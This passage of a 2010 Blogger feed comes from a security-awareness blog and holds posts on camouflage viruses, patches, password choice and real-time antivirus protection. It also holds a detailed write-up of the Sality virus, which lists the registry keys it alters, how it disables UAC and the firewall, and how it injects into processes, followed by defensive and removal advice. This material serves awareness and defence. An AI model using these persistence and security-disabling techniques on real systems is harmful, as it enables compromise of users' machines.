class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/241363155045937421-6950268050661519810?l=creatingcomputervirus.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://creatingcomputervirus.blogspot.com/feeds/6950268050661519810/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://creatingcomputervirus.blogspot.com/2010/09/how-to-remove-irondefender.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/6950268050661519810'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/6950268050661519810'/><link rel='alternate' type='text/html' href='http://creatingcomputervirus.blogspot.com/2010/09/how-to-remove-irondefender.html' title='How to remove IronDefender'/><author><name>Prabin PB</name><uri>http://www.blogger.com/profile/06628605417419260567</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='26' src='http://4.bp.blogspot.com/_mPzqYV2-K04/S1bpilmJVJI/AAAAAAAAAIA/4FN6ahWvfyU/S220/raining.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-241363155045937421.post-7644721181595092561</id><published>2010-08-27T20:40:00.000-07:00</published><updated>2010-08-27T20:40:07.339-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='computer virus'/><category scheme='http://www.blogger.com/atom/ns#' term='camouflage'/><category scheme='http://www.blogger.com/atom/ns#' term='computer security'/><category scheme='http://www.blogger.com/atom/ns#' term='Types of viruses'/><title type='text'>Camouflage Viruses</title><content type='html'>You may not heard about Camouflage viruses. It is becacuse, it has never became a threat thanks to the evolution of advanced antivirus scanners.&amp;nbsp;Camouflage viruses are viruses that are capable of infecting a computer by reporting it as a&amp;nbsp; harmless application to the antivirus software installed in that computer. In the less sophisticated antivirus softwares, the scanning is performed by checking the files for the virus signatures. In such cases, there is a possibility of non-infected files have codes similar to that of the virus codes&amp;nbsp;(a statistical probability) will be notified to the user as virus infected files - a false alarm. This may frighten the user. To avoid this problem, the antivirus softwares implement a logic to ignore a virus signature&amp;nbsp;and not issue alarm under&amp;nbsp;right circumstance.&lt;br /&gt;Eventhough this logic avoid the chances of false alarm, it has opened a door for the virus creators to attempt to camouflage their viruses so that they included the specific characteristics the antivirus softwares were checking for and thus have the antivirus program ignore that particular virus. Fortunately, camouflage virus never became a serious threat, but the possibility existed.&lt;br /&gt;Today, the antivirus scanners are more advanced that they do much more than simply look for a virus signature string. In order to identify the specific virus varient, they not only check for the virus signature, but also even checksum the virus code to identify it. Due to the provision of these cross checks in the antivirus scanner, it would be very difficult for the virus to camouflage itself and spoof the scanner.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.stumbleupon.com/submit?url=http://creatingcomputervirus.blogspot.com/%26title%3DThe%2BArticle%2BTitle"&gt;&lt;img alt="" border="0" src="http://cdn.stumble-upon.com/images/120x20_su_blue.gif" /&gt;&lt;/a&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&lt;a href="http://technorati.com/faves?sub=addfavbtn&amp;amp;add=http://creatingcomputervirus.blogspot.com"&gt;&lt;img alt="Add to Technorati Favorites" src="http://static.technorati.com/pix/fave/tech-fav-1.png" /&gt;&lt;/a&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;a href="http://www.addthis.com/bookmark.php" onclick="return addthis_sendto()" onmouseout="addthis_close()" onmouseover="return addthis_open(this, '', '[URL]', '[TITLE]')"&gt;&lt;img alt="Bookmark and Share" border="0" height="16" src="http://s7.addthis.com/static/btn/lg-share-en.gif" style="border-bottom: 0px; border-left: 0px; border-right: 0px; border-top: 0px;" width="125" /&gt;&lt;/a&gt;&lt;script src="http://s7.addthis.com/js/152/addthis_widget.js" type="text/javascript"&gt;&lt;/script&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/241363155045937421-7644721181595092561?l=creatingcomputervirus.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://creatingcomputervirus.blogspot.com/feeds/7644721181595092561/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://creatingcomputervirus.blogspot.com/2010/08/camouflage-viruses.html#comment-form' title='8 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/7644721181595092561'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/7644721181595092561'/><link rel='alternate' type='text/html' href='http://creatingcomputervirus.blogspot.com/2010/08/camouflage-viruses.html' title='Camouflage Viruses'/><author><name>Prabin PB</name><uri>http://www.blogger.com/profile/06628605417419260567</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='26' src='http://4.bp.blogspot.com/_mPzqYV2-K04/S1bpilmJVJI/AAAAAAAAAIA/4FN6ahWvfyU/S220/raining.jpg'/></author><thr:total>8</thr:total></entry><entry><id>tag:blogger.com,1999:blog-241363155045937421.post-8450597134914275106</id><published>2010-08-27T00:37:00.000-07:00</published><updated>2010-08-27T00:37:37.981-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='computer virus'/><category scheme='http://www.blogger.com/atom/ns#' term='sality'/><category scheme='http://www.blogger.com/atom/ns#' term='computer security'/><title type='text'>Sality Virus : Know more?</title><content type='html'>When I noticed that most of the visitors to my blog are searching for the remedies for infection by Sality Virus. I have already put a brief post on Sality virus at&amp;nbsp;&lt;a href="http://creatingcomputervirus.blogspot.com/2010/03/sality-virus-symptoms-and-removal.html"&gt;creatingcomputervirus.blogspot.com/2010/03/sality-virus-symptoms-and-removal.html&lt;/a&gt;. Now I think more information must be provided&amp;nbsp;innorder to satisfy the visitors.&amp;nbsp; Sality is also known as W32/Kookoo-A [Sophos]. Sality was discovered in 2003 June 4. It affects the Operating Systems - Windows 98, Windows 95, Windows XP, Windows Me, Windows NT, Windows 2000.&lt;br /&gt;&lt;br /&gt;It will infect executable files on local, removable and remote shared drives. The virus also creates a peer-to-peer (P2P) botnet and receives URLs of additional files to download. It then attempts to disable security software. When it infected my system, it disabled my antivirus software (BitDefender Free Edition), and antimalware software (MalwareBytes Free Edition). It also prevent the use of the anti rootkit software Rootkit Revealer.&lt;br /&gt;&amp;nbsp;Some forms of Sality virus is reported to steal the key strokes from the infected machines for malicious purposes.W32.Sality will infect executable files on local, removable and remote shared drives. It replaces the original host code at the entry point of the executable to redirect execution to the polymorphic viral code, which has been encrypted and inserted in the last section of the host file. In addition to infecting local and remotely shared executable files, W32.Sality will purposely search for specific registry subkeys to infect the executable files that run when Windows starts. Thus infected computer is like a country under the rule of the terrorists. All the security will be paralysed leading to complete crack down of the system. Sality will also prevent the installation of the antivirus in to the infected computer.&lt;br /&gt;In 2003 when it was first discovered, W32.Sality was a less complicated file infector, prepending its viral code to a host file and having back door capability and keylogging functionality. As years passed, it became more sophisticated by including additional features that aid worm-like propagation, ensure its survival, and perform maliciously damaging activities. Among these activities is the decentralized peer-to-peer network (P2P) that W32.Sality-infected computers create and populate. &lt;br /&gt;As an entry-point obscuring (EPO) polymorphic file infector, the virus gains control of the host body by overwriting the file with complex and encrypted code instructions. The goal of the complex code is to make analysis more difficult for researchers to see the real purpose and functionality implemented in the code.It spreads by infecting executable files on local, removable and remote shared drives. Infected files will have their original, initial instructions overwritten by complex code instructions with the encrypted viral code body located in the last section of the file.&lt;br /&gt;Downloading and executing other malware or security risks is one of the primary goals of this virus. A compromised host carries with it a list of HTTP URLs that point to resources to be downloaded, decrypted, and executed. These URLs can also point to more URLs. The encryption used is RC4 with static keys embedded in the compromised host.&lt;br /&gt;&lt;br /&gt;&lt;u&gt;&lt;strong&gt;&lt;span style="color: magenta; font-size: large;"&gt;Technical Details:&lt;/span&gt;&lt;/strong&gt;&lt;/u&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&amp;nbsp;In addition to infecting local and remotely shared executable files, W32.Sality will purposely search for the following registry subkeys to infect the executables associated with that subkey, including those executables that run when Windows starts:&lt;br /&gt;&lt;br /&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam&lt;br /&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run&lt;br /&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run&lt;br /&gt;&lt;br /&gt;&lt;span style="color: cyan;"&gt;&lt;em&gt;Files Created:&lt;/em&gt;&lt;/span&gt;&lt;br /&gt;&amp;nbsp;%System%\drivers\[RANDOM FILE NAME]&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: cyan;"&gt;&lt;em&gt;Registry Subkeys Created:&lt;/em&gt;&lt;/span&gt;&lt;br /&gt;&lt;em&gt;&lt;span style="color: cyan;"&gt;&lt;/span&gt;&lt;/em&gt;&lt;br /&gt;HKEY_CURRENT_USER\Software\[USER NAME]914&lt;br /&gt;HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_WMI_MFC_TPSHOKER_80&lt;br /&gt;&lt;br /&gt;HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_IPFILTERDRIVER&lt;br /&gt;&lt;br /&gt;&lt;em&gt;&lt;span style="color: cyan;"&gt;Registry entries deleted&lt;/span&gt;&lt;/em&gt; &lt;br /&gt;&lt;br /&gt;HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot&lt;br /&gt;&lt;br /&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats&lt;br /&gt;&lt;br /&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats&lt;br /&gt;&lt;br /&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats&lt;br /&gt;&lt;br /&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats&lt;br /&gt;&lt;br /&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects&lt;br /&gt;&lt;br /&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects&lt;br /&gt;&lt;br /&gt;&lt;em&gt;&lt;span style="color: cyan;"&gt;Registry entries modified (final values given)&lt;/span&gt;&lt;/em&gt; &lt;br /&gt;HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\"[INFECTED FILE]" = "[INFECTED FILE]:*:Enabled:ipsec"&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Setting\"GlobalUserOffline" = "0"&lt;br /&gt;&lt;br /&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\"EnableLUA" = "0"&lt;br /&gt;&lt;br /&gt;&lt;em&gt;&lt;span style="color: cyan;"&gt;Process Injected:&lt;/span&gt;&lt;/em&gt;&lt;br /&gt;&lt;br /&gt;W32.Sality will not inject into processes that belong to the system, the local service or the network service. However, it does inject complex code instructions into other processes, allowing the code to load external DLLs that are downloaded from remote servers into target processes. This virus uses a named mutex based on the injected process ID (PID) for each injection so that it avoid repeatedly injecting code into the same processes.&lt;br /&gt;&lt;br /&gt;&lt;em&gt;&lt;span style="color: cyan;"&gt;Recommendations:&lt;/span&gt;&lt;/em&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div&gt;&lt;/div&gt;&lt;div&gt;&lt;/div&gt;Use a firewall to block all incoming connections from the Internet to services that should not be publicly available. By default, you should deny all incoming connections and only allow services you explicitly want to offer to the outside world.&lt;br /&gt;&lt;br /&gt;Enforce a password policy. Complex passwords make it difficult to crack password files on compromised computers. This helps to prevent or limit damage when a computer is compromised.&lt;br /&gt;&lt;br /&gt;Ensure that programs and users of the computer use the lowest level of privileges necessary to complete a task. When prompted for a root or UAC password, ensure that the program asking for administration-level access is a legitimate application.&lt;br /&gt;&lt;br /&gt;Disable AutoPlay to prevent the automatic launching of executable files on network and removable drives, and disconnect the drives when not required. If write access is not required, enable read-only mode if the option is available.&lt;br /&gt;&lt;br /&gt;Turn off file sharing if not needed. If file sharing is required, use ACLs and password protection to limit access. Disable anonymous access to shared folders. Grant access only to user accounts with strong passwords to folders that must be shared.&lt;br /&gt;&lt;br /&gt;Turn off and remove unnecessary services. By default, many operating systems install auxiliary services that are not critical. These services are avenues of attack. If they are removed, threats have less avenues of attack.&lt;br /&gt;&lt;br /&gt;If a threat exploits one or more network services, disable, or block access to, those services until a patch is applied.&lt;br /&gt;&lt;br /&gt;Always keep your patch levels up-to-date, especially on computers that host public services and are accessible through the firewall, such as HTTP, FTP, mail, and DNS services.&lt;br /&gt;&lt;br /&gt;Configure your email server to block or remove email that contains file attachments that are commonly used to spread threats, such as .vbs, .bat, .exe, .pif and .scr files.&lt;br /&gt;&lt;br /&gt;Isolate compromised computers quickly to prevent threats from spreading further. Perform a forensic analysis and restore the computers using trusted media.&lt;br /&gt;&lt;br /&gt;Train employees not to open attachments unless they are expecting them. Also, do not execute software that is downloaded from the Internet unless it has been scanned for viruses. Simply visiting a compromised Web site can cause infection if certain browser vulnerabilities are not patched.&lt;br /&gt;&lt;br /&gt;If Bluetooth is not required for mobile devices, it should be turned off. If you require its use, ensure that the device's visibility is set to "Hidden" so that it cannot be scanned by other Bluetooth devices. If device pairing must be used, ensure that all devices are set to "Unauthorized", requiring authorization for each connection request. Do not accept applications that are unsigned or sent from unknown sources.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;&lt;span style="color: magenta;"&gt;Removal:&lt;/span&gt;&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;Since it is hard&amp;nbsp;to install antivirus software in an infected system, it is better to remove it by scanning&amp;nbsp;the infected computer from another computer with an antivirus software capable of detecting and removing Sality virus. Otherwise you may try manual removal&amp;nbsp;which is not recommended.&lt;br /&gt;&amp;nbsp; &lt;br /&gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;a href="http://www.stumbleupon.com/submit?url=http://creatingcomputervirus.blogspot.com/%26title%3DThe%2BArticle%2BTitle"&gt;&lt;img alt="" border="0" src="http://cdn.stumble-upon.com/images/120x20_su_blue.gif" /&gt;&lt;/a&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;a href="http://technorati.com/faves?sub=addfavbtn&amp;amp;add=http://creatingcomputervirus.blogspot.com"&gt;&lt;img alt="Add to Technorati Favorites" src="http://static.technorati.com/pix/fave/tech-fav-1.png" /&gt;&lt;/a&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;a href="http://www.addthis.com/bookmark.php" onclick="return addthis_sendto()" onmouseout="addthis_close()" onmouseover="return addthis_open(this, '', '[URL]', '[TITLE]')"&gt;&lt;img alt="Bookmark and Share" border="0" height="16" src="http://s7.addthis.com/static/btn/lg-share-en.gif" style="border-bottom: 0px; border-left: 0px; border-right: 0px; border-top: 0px;" width="125" /&gt;&lt;/a&gt;&lt;script src="http://s7.addthis.com/js/152/addthis_widget.js" type="text/javascript"&gt;&lt;/script&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/241363155045937421-8450597134914275106?l=creatingcomputervirus.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://creatingcomputervirus.blogspot.com/feeds/8450597134914275106/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://creatingcomputervirus.blogspot.com/2010/08/sality-virus-know-more.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/8450597134914275106'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/8450597134914275106'/><link rel='alternate' type='text/html' href='http://creatingcomputervirus.blogspot.com/2010/08/sality-virus-know-more.html' title='Sality Virus : Know more?'/><author><name>Prabin PB</name><uri>http://www.blogger.com/profile/06628605417419260567</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='26' src='http://4.bp.blogspot.com/_mPzqYV2-K04/S1bpilmJVJI/AAAAAAAAAIA/4FN6ahWvfyU/S220/raining.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-241363155045937421.post-1353331024444862082</id><published>2010-08-12T20:50:00.000-07:00</published><updated>2010-08-12T20:50:09.570-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='patches'/><category scheme='http://www.blogger.com/atom/ns#' term='service pack'/><category scheme='http://www.blogger.com/atom/ns#' term='security patches'/><title type='text'>Patches</title><content type='html'>You mave have heard the term patches several times while using computer. But many of the people don't know what a patch is. Now let us know what a patch is ?&amp;nbsp; &lt;br /&gt;Today, there are hundreds or perhaps thousands of companies that produces softwares for different purposes. These softwares are created by brilliant people according to the specifications given by the customer or by the standards set by the firm. If the software is very large, or has lot of functions, it is generally developed by a group of software engineers by working as a team. After manufacturing the software, it has to be tested for stability and vulnerabilities&amp;nbsp;before handing over to the customer. For this there is a set of tools for software testing. During testing several bugs are found out and they are rectified. After passing the software testing, the software is declared ready for use. &lt;br /&gt;You know, 'to error is human'. Like that every thing that is made by humans will have certain quantity of error in it. Same is the case of the software testing. The softwares that successfully pass the software testing need not be free from vulnerability and bugs. In most cases there will be bugs. In the case of important softwares as used in banks and finantial organisations, the software is tested several times, sometimes may test in sample populations to ensure that the software is free from bugs. &lt;br /&gt;If a bug or vulnerability is found in a software after given to the customer for the use, the software manufacturer releases patch for that software. The goal of the patch is to ensure the correct functioning of the software and to insure that the software is not vulnerable to viruses. A software patch would be applied to a specific program to correct an error in function where as an anti-virus patch might seek to correct specific vulnerabilities linked to the functioning of one particular virus. A security patch, on the other hand, might be designed to strengthen aspects of a machine's connection to a network or to the Internet to guard against incursions into the system from outside sources.&lt;br /&gt;Service packs are groupings of other patches, usually too numerous or complex to be installed one at a time. Usually service packs are directed at repairing known issues in larger software environment like operating systems. Microsoft releases several patches for the operating systems and these pathes are installed during the update of Windows. If you are using Windows Operating System, then install latest patches by Microsoft to make your system more secure against vulnerabilities and software attacks.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;a href="http://www.stumbleupon.com/submit?url=http://creatingcomputervirus.blogspot.com/%26title%3DThe%2BArticle%2BTitle"&gt;&lt;img alt="" border="0" src="http://cdn.stumble-upon.com/images/120x20_su_blue.gif" /&gt;&lt;/a&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&lt;a href="http://technorati.com/faves?sub=addfavbtn&amp;amp;add=http://creatingcomputervirus.blogspot.com"&gt;&lt;img alt="Add to Technorati Favorites" src="http://static.technorati.com/pix/fave/tech-fav-1.png" /&gt;&lt;/a&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;a href="http://www.addthis.com/bookmark.php" onclick="return addthis_sendto()" onmouseout="addthis_close()" onmouseover="return addthis_open(this, '', '[URL]', '[TITLE]')"&gt;&lt;img alt="Bookmark and Share" border="0" height="16" src="http://s7.addthis.com/static/btn/lg-share-en.gif" style="border-bottom: 0px; border-left: 0px; border-right: 0px; border-top: 0px;" width="125" /&gt;&lt;/a&gt;&lt;script src="http://s7.addthis.com/js/152/addthis_widget.js" type="text/javascript"&gt;&lt;/script&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/241363155045937421-1353331024444862082?l=creatingcomputervirus.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://creatingcomputervirus.blogspot.com/feeds/1353331024444862082/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://creatingcomputervirus.blogspot.com/2010/08/patches.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/1353331024444862082'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/1353331024444862082'/><link rel='alternate' type='text/html' href='http://creatingcomputervirus.blogspot.com/2010/08/patches.html' title='Patches'/><author><name>Prabin PB</name><uri>http://www.blogger.com/profile/06628605417419260567</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='26' src='http://4.bp.blogspot.com/_mPzqYV2-K04/S1bpilmJVJI/AAAAAAAAAIA/4FN6ahWvfyU/S220/raining.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-241363155045937421.post-6416085084788971013</id><published>2010-07-12T22:48:00.000-07:00</published><updated>2010-07-12T22:55:36.690-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='password'/><title type='text'>How to choose passwords</title><content type='html'>The era of inland letters and postal greetings is approaching end. Today we could hardly find a person who uses postal service to get in touch with the relatives thanks to the technological developments. The arrival of new players like telecommunication and internet had pushing out the traditional services like postal out of the play ground. Today it is very hard to find a person without email ID. We all of us have email ID and a password to open the email account. The password is created at the time of creating the email ID. Since password can be stolen or guessed, most of the email service providers allows to change the password. While creating password most of the users create password carelessly. Some of them even forget the password after the account is created. The password must be chosen very wisely since internet is the best way to spread bad impression of a person to a great number of people.&lt;br /&gt;Microsoft recommends the password must be at least 14 characters long. The strength of a password is determined by the different types of characters you use. It is always better not to use the words find in dictionaries as passwords. If words from dictionaries are used, the hacker can easily guess the password of your account. Also bear in mind do not use common passwords. Most of the people uses 123456 as password. How simply a hacker can find such a password ? Also don't use locally used words as password. It is very common trend in Kerala to write the PIN number over the ATM cards. It is like handling key of your account to the thief. &lt;br /&gt;You can check the strength of your password at:&amp;nbsp;&lt;a href="https://www.microsoft.com/protect/fraud/passwords/checker.aspx?WT.mc_id=Site_Link"&gt; https://www.microsoft.com/protect/fraud/passwords/checker.aspx?WT.mc_id=Site_Link&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.stumbleupon.com/submit?url=http://creatingcomputervirus.blogspot.com/%26title%3DThe%2BArticle%2BTitle"&gt; &lt;img alt="" border="0" src="http://cdn.stumble-upon.com/images/120x20_su_blue.gif" /&gt;&lt;/a&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;script type="text/javascript"&gt;&lt;/script&gt;&lt;img alt="Add to Technorati Favorites" src="http://static.technorati.com/pix/fave/tech-fav-1.png" /&gt; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &lt;img alt="Bookmark and Share" border="0" height="16" src="http://s7.addthis.com/static/btn/lg-share-en.gif" style="border: 0pt none;" width="125" /&gt;&lt;script src="http://s7.addthis.com/js/152/addthis_widget.js" type="text/javascript"&gt;&lt;/script&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/241363155045937421-6416085084788971013?l=creatingcomputervirus.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://creatingcomputervirus.blogspot.com/feeds/6416085084788971013/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://creatingcomputervirus.blogspot.com/2010/07/how-to-choose-passwords.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/6416085084788971013'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/6416085084788971013'/><link rel='alternate' type='text/html' href='http://creatingcomputervirus.blogspot.com/2010/07/how-to-choose-passwords.html' title='How to choose passwords'/><author><name>Prabin PB</name><uri>http://www.blogger.com/profile/06628605417419260567</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='26' src='http://4.bp.blogspot.com/_mPzqYV2-K04/S1bpilmJVJI/AAAAAAAAAIA/4FN6ahWvfyU/S220/raining.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-241363155045937421.post-4290524347720689400</id><published>2010-07-12T01:40:00.000-07:00</published><updated>2010-07-12T01:40:25.832-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='real time protection'/><title type='text'>Real Time Protection</title><content type='html'>Real Time Protection is one of the features provided by most of the anti viruses. On-access scanning, background guard, resident shield, autoprotect are the other terms that represent real time protection. The term real time protection refers to the feature of the anti malware programs that monitors all the files in the system as well as the data coming into the computer from the internet. It also scans the files in the memory. If any change in the file or the data coming to the computer is found suspicious, then it will be reported to the user. If necessary the user can consult the recommendations from the experts by submitting the suspicious files to the anti malware manufacturer. The real time protection monitors the changes made in the files located in the hard drives and memory and also the data flowing to the computer from the internet while browsing checking emails and also when downloading files. Real time protection also includes monitoring the removable drives like CD, floppy, pen drives etc. In short the real time protection enables even the beginner to use the computer safely without even having the basic knowledge related to security issues.&lt;br /&gt;Most real-time protection systems hook certain API functions provided by the operating system in order to scan files in real-time. For example, on Microsoft Windows, an antivirus program may hook the CreateProcess API function which executes programs. It can then scan programs which are about to be executed for malicious software. If malicious software is found, the antivirus program can block execution and inform the user.&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/_mPzqYV2-K04/TDrULYYw9LI/AAAAAAAAAK4/Imu2PzWjeA0/s1600/realtime.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://2.bp.blogspot.com/_mPzqYV2-K04/TDrULYYw9LI/AAAAAAAAAK4/Imu2PzWjeA0/s320/realtime.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;Avast, Avira, Comodo Internet Security are some of the programs with real time protection. It is recommended to use an antivirus with real time protection so that malware can be blocked before it infects the PC. If viruses like Sality infects the PC, the whole security of the computer will be compromised. So it is better to prevent it before entering the system.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.stumbleupon.com/submit?url=http://creatingcomputervirus.blogspot.com/%26title%3DThe%2BArticle%2BTitle"&gt; &lt;img alt="" border="0" src="http://cdn.stumble-upon.com/images/120x20_su_blue.gif" /&gt;&lt;/a&gt; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &lt;img alt="Add to Technorati Favorites" src="http://static.technorati.com/pix/fave/tech-fav-1.png" /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;img alt="Bookmark and Share" border="0" height="16" src="http://s7.addthis.com/static/btn/lg-share-en.gif" style="border: 0pt none;" width="125" /&gt;&lt;script src="http://s7.addthis.com/js/152/addthis_widget.js" type="text/javascript"&gt;&lt;/script&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/241363155045937421-4290524347720689400?l=creatingcomputervirus.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://creatingcomputervirus.blogspot.com/feeds/4290524347720689400/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://creatingcomputervirus.blogspot.com/2010/07/real-time-protection.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/4290524347720689400'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/4290524347720689400'/><link rel='alternate' type='text/html' href='http://creatingcomputervirus.blogspot.com/2010/07/real-time-protection.html' title='Real Time Protection'/><author><name>Prabin PB</name><uri>http://www.blogger.com/profile/06628605417419260567</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='26' 